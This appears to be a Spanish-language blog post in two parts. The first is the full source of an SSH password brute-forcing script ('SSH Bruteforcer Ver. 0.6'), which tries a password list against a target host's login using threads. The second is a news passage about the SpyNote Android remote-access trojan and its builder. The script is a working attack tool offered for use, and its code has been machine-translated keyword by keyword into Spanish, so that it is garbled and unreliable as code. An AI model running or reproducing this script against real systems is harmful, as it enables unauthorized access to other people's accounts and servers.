Scanner SSH puerto 22

importación hilo
importación tiempo
de roscar importación Tema
importación sys , os , threading , tiempo , rastreo , getopt
importación paramiko
importación de terminales

mundial ADX
mundial puerto

ADX = "1"
puerto = 22
datos = []
i = []

plazo = terminales . TerminalController ()
paramiko . util . log_to_file ( 'demo.log' )

print "\ n *************************************"
print "*" + término . ROJO + "SSH Bruteforcer Ver. 0.6" + término . NORMAL + "*"
print "* Codificado por Christian Martorella *"
print "* Edge-Security Research *"
print "*cmartorella@edge-security.com *"
print "************************************* \ n"

def uso ():
    impresión "de uso: brutessh.py opciones \ n"
    print "-h: host de destino"
    print "-u: nombre de usuario a la fuerza"
    print "-d: archivo de contraseñas"
    impresión "-t: hilos (por defecto 12, más podría ser malo)"
    print "-p: puerto de destino \ n"
    print "Ejemplo: 192.168.1.55 brutessh.py -h -u root mypasswordlist.txt -d \ n"
    sys . de salida ()

clase vigor ( Tema ):
        def __init__ ( self , nombre , num ):
                Tema . __init__ ( auto )
                auto . nombre = nombre
                auto . num = str ( num )

        def run ( auto ):
                mundial ADX
                si ADX == "1" :
                        passw = auto . nombre . división ( "\ n" ) [ 0 ]
                        impresión plazo . BOL + término . UP + término . CLEAR_EOL + auto . num + "/" + str ( totaldict ) + "" + PASSW + término . NORMAL
                        t = paramiko . Transporte ( nombre de host )
                        tratar :
                                t . start_client ()
                        salvo excepciones :
                                x = 0

                        tratar :
                                t . AUTH_PASSWORD ( nombre de usuario = nombre de usuario , contraseña = passw )
                        salvo excepciones :
                                x = 0

                        si t . is_authenticated ():
                                impresión plazo . ABAJO + término . GREEN + "\ Nauth SÍ ---> Contraseña Encontrados:" + PASSW + término . ABAJO + término . NORMAL
                                t . cerrar ()
                                ADX = "0"
                                sys . de salida ()
                        otra cosa :
                                t . cerrar ()
                tiempo . dormir ( 0 )
                i [ 0 ] = i [ 0 ] - 1


def test_thread ( nombres ):
        i . append ( 0 )
        j = 0
        mientras que len ( nombres ):
                tratar :
                        si i [ 0 ] < º :
                                n = nombres . pop ( 0 )
                                i [ 0 ] = i [ 0 ] + 1
                                hilo = fuerza ( n , j )
                                hilo . iniciar ()
                                j = j + 1
                excepto KeyboardInterrupt :
                        print "Ataque suspendida por usuario .. \ n"
                        sys . de salida ()
        hilo . unirse ()

def prueba ( argv ):
        mundial ª
        mundial nombre de host
        mundial nombre de usuario
        mundial totaldict
        º = 12
        si len ( sys . argv ) < 3 :
                el uso de ()
        tratar :
                opta , args = getopt . getopt ( argv , "h: u: d: t: t:" )
        excepto getopt . GetoptError :
                el uso de ()
        para opt , arg en opta :
                si opt == '-u' :
                        username = arg
                elif optar == '-h' :
                        nombre de host = arg
                elif optar == '-d' :
                        password = arg
                elif optar == "-t" :
                        º = arg
                elif optar == "-p" :
                        puerto = arg
        tratar :
                f = abierto ( contraseña , "r" )
        excepto :
                print "No se puede abrir archivo de contraseñas \ n"
                sys . de salida ()
        impresión plazo . ROJO + "Anfitrión:" + término . NORMAL +  nombre de host + término . ROJO
        print "Nombre de usuario:" + término . NORMAL +  nombre de usuario + término . ROJO
        print "archivo de contraseña:" + término . NORMAL + contraseña
        imprimir "================================================ ========= "
        print "password Tratando ... \ n"
        nombre = f . readlines ()
        totaldict = len ( nombre )
        starttime = tiempo . reloj ()
        test_thread ( nombre )
        tiempo de parada = tiempo . reloj ()
        print "\ nTimes -> Init:" + str ( starttime ) + "End:" + str ( hora de detención )
        print "\ n"
       
si __name__ == "__main__" :
        tratar :
                prueba ( sys . argv [ 1 :])
        excepto KeyboardInterrupt :
                print "Ataque suspendida por usuario ... \ n"
                sys . de salida ()

Troyano RAT para Android

Cada vez es más habitual utilizar nuestro dispositivo móvil para todo tipo de acciones y guardar en ellos todo tipo de archivos, incluso personales y confidenciales. Por ello, estos dispositivos son cada vez objetivos más interesantes para los piratas informáticos, quienes buscan vulnerabilidades para explotar los dispositivos y hacerse con el control de ellos y desarrollan nuevas y peligrosas herramientas de software malicioso que les permitan tomar el control total de los mismos de forma remota, como es el caso del nuevo troyano RAT SpyNote.

Recientemente, en varios foros sobre seguridad informática se ha publicado un compilador de lo que puede ser un nuevo troyano RAT para Android. Analizando este compilador, los expertos de seguridad han descubierto una gran similitud con otras variantes similares como Om. y DroidJack y, según la actividad de los foros de la Deep Web, es posible que esta nueva amenaza esté lista para empezar a distribuirse a nivel mundial en cualquier 

Además de todas sus funciones anteriores, una de las características más relevantes es que es capaz de funcionar sin restricciones incluso en dispositivos sin root.



Ninguna de las funciones de SpyNote necesita root

Hasta ahora, muchos troyanos similares necesitaban tener permisos de root para funcionar, lo que limitaba su radio de acción u obligaba a los piratas informáticos a incluir en ellos exploits que le permitieran conseguir dichos permisos aprovechando vulnerabilidades como las de los procesadores Qualcomm. Sin embargo, SpyNote no necesita en ningún momento permisos de root para desatar todo su potencial, aunque a cambio de eso tendrá que pedir al usuario un gran número de permisos, lo que debería levantar sospechas.
La última versión 2 de SpyNote cuenta con un compilador que permite a los piratas informáticos montar su propia versión del troyano y redirigir todo el tráfico a su propio servidor de control, sin embargo, por el momento no se sabe si este troyano se distribuirá por la red como una herramienta abierta o si los piratas informáticos intentarán venderlo a los usuarios interesados, incluso no sería descabellado ver un modelo de negocio MaaS (Malware as a Service) donde los piratas informáticos alquilen el acceso al servidor C&C al mejor postor.
¿Crees que estamos ante una grave amenaza para la seguridad de Android?
esto fue compartido por los servidores https://www.redeszone.net   y si no comprender le hago el video cuando no encuentre nada que hacer